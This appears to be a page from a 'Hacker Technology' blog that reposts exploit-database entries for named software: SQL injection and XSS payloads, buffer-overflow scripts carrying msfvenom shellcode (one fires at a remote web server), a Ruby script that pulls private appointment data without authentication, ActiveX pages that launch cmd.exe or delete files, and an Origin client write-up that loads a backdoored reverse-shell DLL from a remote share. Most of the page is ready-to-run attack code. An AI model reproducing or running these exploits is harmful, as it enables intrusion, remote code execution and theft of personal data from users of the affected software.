Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863153556

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Easy Blog PHP Script v1.3a - SQL Injection
# Date: 2017-09-27
# Exploit Author: 8bitsec
# Vendor Homepage: https://www.codester.com/
# Software Link: https://www.codester.com/items/4616/easy-blog-php-script
# Version: 1.3a
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-09-27

Product & Service Introduction:
===============================
A simple and easy to setup script that allows you to have your own basic blog that comes packed with professional features.

Technical Details & Description:
================================

SQL injection on [id] parameter.

Proof of Concept (PoC):
=======================

SQLi:

http://localhost/[path]/article.php?id=8' AND 7160=7160 AND 'cbgz'='cbgz

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=8' AND 7160=7160 AND 'cbgz'='cbgz

==================
8bitsec - [https://twitter.com/_8bitsec]
HireHackking 
#!/usr/bin/python
###########################################################################################
# Exploit Title      : Easy Avi Divx Xvid to DVD Burner v2.9.11 - Local Denial of Service #
# Exploit Author     : Hashim Jawad                                                       #
# Twitter            : @ihack4falafel                                                     # 
# Author Website     : ihack4falafel[.]com                                                #
# Vendor Homepage    : http://www.divxtodvd.net/index.htm                                 #
# Vulnerable Software: http://www.divxtodvd.net/easy_divx_to_dvd.exe                      #
# Tested on OS       : Windows XP professional SP3                                        #
#                      Windows 10 professional 64-bit                                     #
# Steps to reproduce : Add Evil.AVI and BOOM!                                             #
###########################################################################################

buffer = "A" * 500

try:
	f=open("Evil.AVI","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"
HireHackking 
#!/usr/bin/python
 
###############################################################################
# Exploit Title:        Easy AVI DivX Converter 1.2.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date:                 24-08-2017
# Exploit Author:       Anurag Srivastava 
# Website:		www.pyramidcyber.com
# Vulnerable Software:  Easy AVI DivX Converter 
# Vendor Homepage:      http://www.divxtodvd.net/
# Version:              1.2.24
# Software Link:        http://www.divxtodvd.net/easy_avi_converter.exe
# Tested On:            Windows 7 x64 
#
#
# To reproduce the exploit:
#   1. Click Register
#   2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
 

buffer = "\x41" * 1008   
 
nSEH = "\xeb\x10\x90\x90"
 
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
 
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
 
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf =  ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
 
nops = "\x90" * 16
 
badchars = "\x0a\x0d"
 
data = buffer + nSEH + SEH + nops + buf
 
f = open ("pyramid.txt", "w")
f.write(data)
f.close()
HireHackking 
# Exploit Title: Easy Appointments 1.4.2 - Information Disclosure
# Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)
# Author website: https://pwn.by/noraj/
# Exploit source: https://github.com/Acceis/exploit-CVE-2022-0482
# Date: 2022-04-11
# Vendor Homepage: https://easyappointments.org/
# Software Link: https://github.com/alextselegidis/easyappointments/archive/refs/tags/1.4.2.tar.gz
# Version: < 1.4.3 (it means up to 1.4.2)
# Tested on: Easy!Appointments Version 1.3.2

# Vulnerability
## Discoverer: Francesco CARLUCCI
## Date: 2022-01-30
## Discoverer website: https://carluc.ci/
## Discovered on OpenNetAdmin 1.4.2
## Title: Exposure of Private Personal Information to an Unauthorized Actor in alextselegidis/easyappointments
## CVE: CVE-2022-0482
## CWE: CWE-863
## Patch: https://github.com/alextselegidis/easyappointments/commit/bb71c9773627dace180d862f2e258a20df84f887#diff-4c48e5652fb13f13d2a50b6fb5d7027321913c4f8775bb6d1e8f79492bdd796c
## References:
##   - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/
##   - https://github.com/alextselegidis/easyappointments/tree/1.4.2
##   - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-0482.yaml
##   - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/
##   - https://nvd.nist.gov/vuln/detail/CVE-2022-0482

#!/usr/bin/env ruby

require 'date'
require 'httpx'
require 'docopt'

doc = <<~DOCOPT
Easy!Appointments < 1.4.3 - Unauthenticated PII (events) disclosure

  Source: https://github.com/Acceis/exploit-CVE-2022-0482

  Usage:
    #{__FILE__} <url> [<startDate> <endDate>] [--debug]
    #{__FILE__} -h | --help

  Options:
    <url>       Root URL (base path) including HTTP scheme, port and root folder
    <startDate> All events since (default: 2015-01-11)
    <endDate>   All events until (default: today)
    --debug     Display arguments
    -h, --help  Show this screen

  Examples:
    #{__FILE__} http://10.0.0.1
    #{__FILE__} https://10.0.0.1:4567/subdir 2022-04-01 2022-04-30
DOCOPT

def fetch_csrf(root_url, http)
  vuln_url = "#{root_url}/index.php"

  http.get(vuln_url)
end

def exploit(root_url, startDate, endDate, http)
  vuln_url = "#{root_url}/index.php/backend_api/ajax_get_calendar_events"

  params = {
    'csrfToken' => http.cookies.first.value, # csrfCookie
    'startDate' => startDate.nil? ? '2015-01-11' : startDate,
    'endDate' => endDate.nil? ? Date.today.to_s : endDate
  }

  http.post(vuln_url, form: params)
end

begin
  args = Docopt.docopt(doc)
  pp args if args['--debug']

  http = HTTPX.plugin(:cookies)
  fetch_csrf(args['<url>'], http)
  puts exploit(args['<url>'], args['<startDate>'], args['<endDate>'], http).body
rescue Docopt::Exit => e
  puts e.message
end
HireHackking 
#!/usr/bin/python
# Exploit Title: Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow 
# Version:       1.6
# Date:          2015-08-23
# Author:        Tracy Turben (tracyturben@gmail.com)
# Software Link: http://www.efssoft.com/
# Tested on:     Win7x32-EN,Win7x64-EN


from struct import pack
import socket,sys
import os
  
host="192.168.1.15"
port=80
  
nopsled0 = "A" * 80 

EDX = pack('<L',0x1001AFB8) # 1001AFE0 - 28 = 1001AFB8  JG SHORT 1001AF91 to MOV EAX,EBX POP EBP POP EBX RETN Return to Shellcode   

nopsled1="\x90" * 20

extraroom = "\x90" * 780 
# windows/exec CMD=calc.exe 
# Encoder: x86/shikata_ga_nai
# bad characters '\x00\x0a\x0d'

shellcode=("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
"\xa5\x59\x50")
 
payload=nopsled0 + EDX + nopsled1 + shellcode + extraroom
 
buf="GET //addrbook.ghp? HTTP/1.1\r\n"
buf+="User-Agent: Mozilla/4.0\r\n"
buf+="Host:" + host + ":" + str(port) + "\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buf+="Accept-Language: en-us\r\n"
buf+="Accept-Encoding: gzip, deflate\r\n"
buf+="Referer: http://" + host + "/\r\n"
buf+="Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=;\r\n"
buf+="Conection: Keep-Alive\r\n\r\n"
  
print "[*] Connecting to Host " + host + "..."
 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect=s.connect((host, port))
    print "[*] Connected to " + host + "!"
except:
    print "[!] " + host + " didn't respond\n"
    sys.exit(0)
     
print "[*] Sending malformed request..."
s.send(buf)
 
print "[!] Exploit has been sent!\n"
s.close()
HireHackking 
source: https://www.securityfocus.com/bid/48393/info

Easewe FTP OCX ActiveX control is prone to multiple insecure-method vulnerabilities.

Attackers can exploit these issues to perform unauthorized actions or execute arbitrary programs. Successful exploits may result in compromise of affected computers.

Easewe FTP OCX ActiveX control 4.5.0.9 is vulnerable; other versions may also be affected. 

1.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="c:\windows\system32\cmd.exe"
arg2=""
arg3=1
target.Execute arg1 ,arg2 ,arg3
End Sub
</script>
</html>

2.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="c:\windows\system32\cmd.exe"
arg2=""
arg3=1
target.Run arg1 ,arg2 ,arg3
End Sub
</script>
</html>

3.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
arg1="FilePath\Filename_to_create"
target.CreateLocalFile arg1
End Sub

</script>
</html>

4.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
arg1="Directorypath\Directory"
target.CreateLocalFolder arg1
End Sub

</script>
</html>

5.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
arg1="FilePath\Filename_to_delete"
target.DeleteLocalFile arg1
End Sub
</script>
</html>

<HTML>
Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit<br>
<br>
Description There is Insecure Method in (LocalFileCreate) fonction<br>
Found By : coolkaveh<br>

<title>Exploited By : coolkaveh </title>
<BODY>
 <object id=cyber
classid="clsid:{31AE647D-11D1-4E6A-BE2D-90157640019A}"></object>

<SCRIPT>

function Do_it()
 {
     File = "kaveh.txt"
   cyber.LocalFileCreate(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Click
here To Test"><br>
</body>
</HTML>
HireHackking 
# Exploit Title: EaseUS Data Recovery - 'ensserver.exe'  Unquoted Service Path
# Discovery by: bios
# Discovery Date: 2022-18-04
# Vendor Homepage: https://www.easeus.com/
# Tested Version: 15.1.0.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro x64

# Step to discover Unquoted Service Path:

C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto
| findstr /i /v "C:\Windows\\" | findstr /i /v """
EaseUS UPDATE SERVICE
        EaseUS UPDATE SERVICE                     C:\Program Files
(x86)\EaseUS\ENS\ensserver.exe                                          Auto

C:\>sc qc "EaseUS UPDATE SERVICE"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: EaseUS UPDATE SERVICE
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\EaseUS\ENS\ensserver.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : EaseUS UPDATE SERVICE
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>systeminfo

Host Name:                 DESKTOP-HR3T34O
OS Name:                   Microsoft Windows 10 Home
OS Version:                10.0.19042 N/A Build 19042
HireHackking 
# Exploit Title: Ease Audio Converter 5.30 Audio Cutter Dos Exploit
# Date: 19.04.19
# Vendor Homepage:http://www.audiotool.net/download.htm
# Software Link:  http://www.audiotool.net/download/audioconverter.exe
# Exploit Author: Achilles
# Tested Version: 5.30
# Tested on: Windows 7 x64 Sp1

# 1.- Run the python script, it will create a new file with the name "Evil.mp4"
# 2.- Open AudioConverter.exe and Click Function and choose Audio Cutter
# 3.- Load the file "Evil.mp4"
# 4.- Click ok
# 5.- Click Gut
# 5.- And you will see a crash.



#!/usr/bin/env python
buffer = "\x41" * 6000

try:
	f=open("Evil.mp4","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"
HireHackking 
# Exploit Title: EA Origin <10.5.38 Remote Code Execution
# Date: 05/22/2019
# Exploit Author: Dominik Penner (@zer0pwn)
# Vendor Homepage: https://www.origin.com
# Software Link: https://www.origin.com/can/en-us/store/download
# Version: 10.5.38 and below
# Tested on: Windows 7, Windows 8, Windows 10
# CVE : CVE-2019-12828

Electronic Arts' Origin Client on Windows in versions 10.5.38 and below is vulnerable to an argument injection vulnerability, that if leveraged properly, can ultimately yield remote code execution.

NOTE: THIS IS TO BE READ IN MARKDOWN (.MD) FORMAT

# 0x01 Introduction

Over the past month or so, I've spent quite a bit of time reading and experimenting with custom URI schemes. As the last post on this blog clearly demonstrated, a poorly implemented custom URI can have a number of security concerns. When I say "a number", it's because I'm about to bring a few more to light, using EA's Origin Client as our crash test dummy.

TL;DR: Another Origin RCE, unrelated to CVE-2019-11354.

# 0x02 Custom URI Schemes

In this demonstration, we're going to be using the Origin client. However, this vulnerability can be found in a number of other applications. This technique is hardly Origin specific. In order for us to fully understand how this exploit works, we need to understand how Windows treats custom URI schemes.

If we look for Origin's URI scheme in the registry, this is what we find.

[![](https://zeropwn.github.io/assets/origin_regedit.png "Origin Regedit")](https://zeropwn.github.io/assets/origin_regedit.png)

As we can see by this snippet, 

```
"C:\Program Files (x86)\Origin\Origin.exe" "%1"
```

whenever we call ```origin://``` or ```origin2://```, Windows will use ```ShellExecute()``` to spawn the process and replace %1 with our input.

For example:

```
origin://game/launch
```

Spawns the Origin process with the following command line arguments:

```
C:\Program Files (x86)\Origin\Origin.exe "origin://game/launch"
```

If we RTFM a little bit and check out MSDN's documentation on registering custom URI schemes, we'll see that they point out some security issues. This is what they have to say:

"As noted above, the string that is passed to a pluggable protocol handler might be broken across multiple parameters. Malicious parties could use additional quote or backslash characters to pass additional command line parameters. For this reason, pluggable protocol handlers should assume that any parameters on the command line could come from malicious parties, and carefully validate them. Applications that could initiate dangerous actions based on external data must first confirm those actions with the user. In addition, handling applications should be tested with URIs that are overly long or contain unexpected (or undesirable) character sequences."

This basically means that the application should be responsible for making sure that there aren't any illegal characters or arguments injected via the crafted URI.

## A long history of URI-based exploits
As detailed in this blog post... argument injection via URI isn't new... at all. [https://medium.com/0xcc/electrons-bug-shellexecute-to-blame-cacb433d0d62](https://medium.com/0xcc/electrons-bug-shellexecute-to-blame-cacb433d0d62)

Some of these vulnerabilities can escape the "%1" argument by adding an unencoded " to the URI. For example, to inject arguments with CVE-2007-3670, all you had to do was get a remote user to visit your specially crafted iframe + URI, and the process would be spawned with the additional arguments injected.

```
firefoxurl://placeholder" --argument-injection
```

### Couldn't you just use command injection?

Because of the way ShellExecute gets called and passes the arguments, you cannot ultimately inject your own commands, only arguments.


# 0x03 Argument Injection

Due to the way that most applications (browsers, mail clients, etc) handle URIs, this becomes difficult to exploit in 2019. Modern browsers (Chrome, Firefox, Edge) will force encode certain characters when a link is handled. This obviously makes escaping the encapsulation difficult.

However, for custom URIs that don't have encapsulated arguments in the registry, you can easily just inject arguments with a space.

mIRC was recently vulnerable to this, to achieve RCE, the payload ending up being as simple as:

```
<iframe src='irc://? -i\\127.0.0.1\C$\mirc-poc\mirc.ini'>
```

You can read more about how that exploit was discovered and exploited here:
[https://proofofcalc.com/cve-2019-6453-mIRC/](https://proofofcalc.com/cve-2019-6453-mIRC/)


Anyways, for this example with Origin, we're just going to spin up a fresh Windows 8 box and use IE11. We'll talk more about bypassing modern security mechanisms later.

## The Payload

So now that we've spun up our virtual machine, make sure you have Origin installed. Open a notepad, and paste the following:

```
<iframe src='origin://?" -reverse "'>
```

Open it in Internet Explorer, and allow Origin to launch (if it even prompts, lol). You should see the following.

[![](https://zeropwn.github.io/assets/origin_reverse.png "Origin Arginj")](https://zeropwn.github.io/assets/origin_reverse.png)

As you can see in the image above, the window icons are now loading in reverse. I failed to mention this, however "-reverse" is a Qt specific argument. Origin is written mainly using the Qt framework, which is what enticed me into trying these arguments.

If we take a look at the process using Process Explorer, we see the following:

[![](https://zeropwn.github.io/assets/origin_reverse_poc.png "Origin Arginj")](https://zeropwn.github.io/assets/origin_reverse_poc.png)

This clearly demonstrates the argument injection.

# 0x04 Arbitrary Code Execution

Now how on earth are we supposed to get code execution from this? For us to see what options we have available, we need to know what other arguments we can use. We'll stick to the Qt specific arguments before poking around Origin's own arguments.

After consulting the Qt documentation [https://doc.qt.io/qt-5/qguiapplication.html](https://doc.qt.io/qt-5/qguiapplication.html), we find out that we can use the following arguments on ANY Qt program.

```
-platform
-platformpluginpath
-platformtheme
-plugin
-qmljsdebugger
-qwindowgeometry
-qwindowicon
-qwindowtitle
-reverse
-session
-display
-geometry
```

One of the more promising ones was "platformpluginpath". This flag allows you to specify a path to load Qt plugins from. These Qt plugins (DLLs) are then loaded into Origin and executed.

We can exploit this behavior and load plugins remotely if we supply the platformpluginpath argument with a Windows share. 

Qt gives us a table of Qt plugins along with their respective directories. The QGuiApplication will automatically load valid DLLs that are a child of any of the following directories, when given the platformpluginpath argument.

Base Class | Directory | Qt Module
-----------|-----------|-----------
QAccessibleBridgePlugin|accessiblebridge| Qt GUI
QImageIOPlugin|imageformats| Qt GUI
QPictureFormatPlugin|pictureformats| Qt GUI
QAudioSystemPlugin|audio| Qt Multimedia
QDeclarativeVideoBackendFactoryInterface|video/declarativevideobackend|Qt Multimedia
QGstBufferPoolPlugin|video/bufferpool|Qt Multimedia
QMediaPlaylistIOPlugin|playlistformats|Qt Multimedia
QMediaResourcePolicyPlugin|resourcepolicy|Qt Multimedia
QMediaServiceProviderPlugin|mediaservice|Qt Multimedia
QSGVideoNodeFactoryPlugin|video/videonode|Qt Multimedia
QBearerEnginePlugin|bearer|Qt Network
QPlatformInputContextPlugin|platforminputcontexts|Qt Platform Abstraction
QPlatformIntegrationPlugin|platforms|Qt Platform Abstraction
QPlatformThemePlugin|platformthemes|Qt Platform Abstraction
QGeoPositionInfoSourceFactory|position|Qt Positioning
QPlatformPrinterSupportPlugin|printsupport|Qt Print Support
QSGContextPlugin|scenegraph| Qt Quick
QScriptExtensionPlugin|script| Qt Script
QSensorGesturePluginInterface|sensorgestures| Qt Sensors
QSensorPluginInterface|sensors| Qt Sensors
QSqlDriverPlugin|sqldrivers| Qt SQL
QIconEnginePlugin|iconengines| Qt SVG
QAccessiblePlugin|accessible| Qt Widgets
QStylePlugin|styles| Qt Widgets


Because Origin uses the QtWebEngine and works with image files (jpg, gif, bmp, etc), it requires a few Qt plugins. If we take a look in Origin's install path, we'll see an "imageformats" directory, which is populated by a number of DLLs.

[![](https://zeropwn.github.io/assets/imageformats_plugins.png "Origin Arginj")](https://zeropwn.github.io/assets/imageformats_plugins.png)

Since we know for sure that Origin works with those following DLLs, we can take one of them and use them as a template for our reverse_tcp.

Before we move forward however, let's just make sure that we can reach a remote destination via the platformpluginpath flag.

[![](https://zeropwn.github.io/assets/origin_remote_plugin.png "Origin Arginj")](https://zeropwn.github.io/assets/origin_remote_plugin.png)

Looks good to me.

## Creating the Backdoored Plugin

As I mentioned earlier, since we have a few DLLs that we know for sure Origin uses, we can use them as templates for an msfvenom payload. The following image demonstrates the creation of a reverse_tcp by first using a DLL file as a template. Qt is pretty picky about what plugins get loaded into memory, which is why I decided to use a template. However, for future reference, all it requires is a valid ```.qtmetad``` section.


[![](https://zeropwn.github.io/assets/create_payload.png "Origin Arginj")](https://zeropwn.github.io/assets/create_payload.png)

Now that we've created our backdoored plugin, all we have to do is host a Windows share where we can remotely download it from.

This Windows share must have one of the directories from the table within it, otherwise it won't properly load the DLL. Since we're using imageformats... well, we'll use imageformats.

[![](https://zeropwn.github.io/assets/remote_share.png "Origin Arginj")](https://zeropwn.github.io/assets/remote_share.png)

Where imageformats is hosting our backdoored plugin "FILE1337.dll"

## Finalizing the Payload

Obviously, this isn't complete yet. We have "arguably" arbitrary code execution, but not remote yet as we have no way to get a user to actually launch our crafted URI. This is where the iframe comes in.

```
<iframe src='origin://?" -platformpluginpath \\NOTDANGEROUS "'>
```

We can host this iframe wherever we want, our target just needs to open it on an outdated browser. If you try the following on Firefox, the process getting spawned looks like this:

[![](https://zeropwn.github.io/assets/opened_from_firefox.png "Origin Arginj")](https://zeropwn.github.io/assets/opened_from_firefox.png)

Clearly this defeats the argument injection, which is what I mentioned earlier. This makes exploiting the Origin vulnerability much more difficult.

Unless we can find a way to launch the process without encoding the special characters on an updated system... this exploit may not pose as big a threat.

Anyways, like before, let's just make sure everything works on Internet Explorer before we get ahead of ourselves.

<iframe width="780" height="550" src="https://www.youtube.com/embed/E9vCx9KsF3c" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>

# 0x05 An Issue With .URL Files

Seeing as modern browsers seem to protect against injecting arguments into custom URIs, I decided to look into Windows shortcuts. Interestingly enough, shortcut files do not encode special characters, which is an issue on its own. Would Microsoft consider this an issue? Hard to say. If they do, you saw it here first lol.

Anyways, a .url file typically looks like this:

```
[InternetShortcut]
URL=https://www.google.com
```

If you click that file, it will open Google in your default browser. However, if we supply it a custom URI, it will launch using said URI. On top of that... we can inject arguments, because of the lack of sanitization. This could be used to exploit a number of applications... not just Origin.

You can use the following .URL file on a fully updated Windows 10 to inject arguments into the Origin process. Let's check it out.

```
[InternetShortcut]
URL=origin://?" -reverse "
```

[![](https://zeropwn.github.io/assets/origin_win10.png "Origin Arginj")](https://zeropwn.github.io/assets/origin_win10.png)

The Origin icon you're seeing in the background is the shortuct itself. Nearly impossible to notice the difference between a legitimate Origin.exe shortcut.

Clearly this attack vector would require some social engineering. .URL files aren't considered dangerous by most browsers. For example, Edge will ask you if you want to open the file, it'll smart-scan it, pass the scan, and launch the process with the injected arguments. 

If you were to convince someone to open a specially crafted .url file, you could leverage code execution and infect someone via the custom URI scheme Origin has implemented.


# 0x06 Tying It All Togther

We've gotten this far, you may have a couple questions. One of them may be, what if the Origin process is already running? How will the arguments get injected then?

That's where some of Origin's built-in command-line options will come in handy. There are a number of arguments that Origin accepts that we can use maliciously. So, let's say Origin's already running. In our payload, simply add the following argument:

```
origin://?" -Origin_MultipleInstances "
```

If there's another Origin process running, it'll spawn a brand new one with the arguments we supplied.

Now, let's also assume that someone installed Origin months ago and haven't touched it in the same amount of time. Whenever Origin starts, it automatically checks for updates before doing anything else. Which means that if Origin were to push out a patch, your client would update before the payload was even executed.

If we feed Origin the following argument, we can jump over the entire update check.

```
origin://?" /noUpdate "
```

Another thing we can do... is let Origin run in the background without bringing any attention to the process. Combine all of that along with the remote plugin preload and you've got a pretty fun exploit.

```
origin://?" /StartClientMinimized /noUpdate -Origin_MultipleInstances "
```


# References
* [https://medium.com/0xcc/electrons-bug-shellexecute-to-blame-cacb433d0d62](https://medium.com/0xcc/electrons-bug-shellexecute-to-blame-cacb433d0d62)
* [https://www.thezdi.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-cve-2019-1636-and-cve-2019-6739](https://www.thezdi.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-cve-2019-1636-and-cve-2019-6739)
* [https://proofofcalc.com/cve-2019-6453-mIRC](https://proofofcalc.com/cve-2019-6453-mIRC)
* [https://doc.qt.io/qt-5/qguiapplication.html](https://doc.qt.io/qt-5/qguiapplication.html)
HireHackking 
source: https://www.securityfocus.com/bid/47697/info

E2 Photo Gallery is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/uploader/index.php/[xss]
HireHackking

e107 v2.3.2 - Reflected XSS 

# Exploit Title: e107 v2.3.2 - Reflected XSS
# Date: 11/05/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 2.3.2
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### XSS Reflected - unauthorized

URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php
Parameters: content

# POC
Request:
POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 1126
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: text/html, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/><script>alert(1)</script>bb&mode=tohtml

Response:
HTTP/1.1 200 OK
Date: Thu, 11 May 2023 19:38:45 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1053
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- bbcode-html-start --><p><strong>Lore"/><script>alert(1)</script>bb

### XSS Reflected - Authorized

URL: http://127.0.0.1/e107/e107_admin/image.php
Parameters: for

# POC 1
Request:
GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
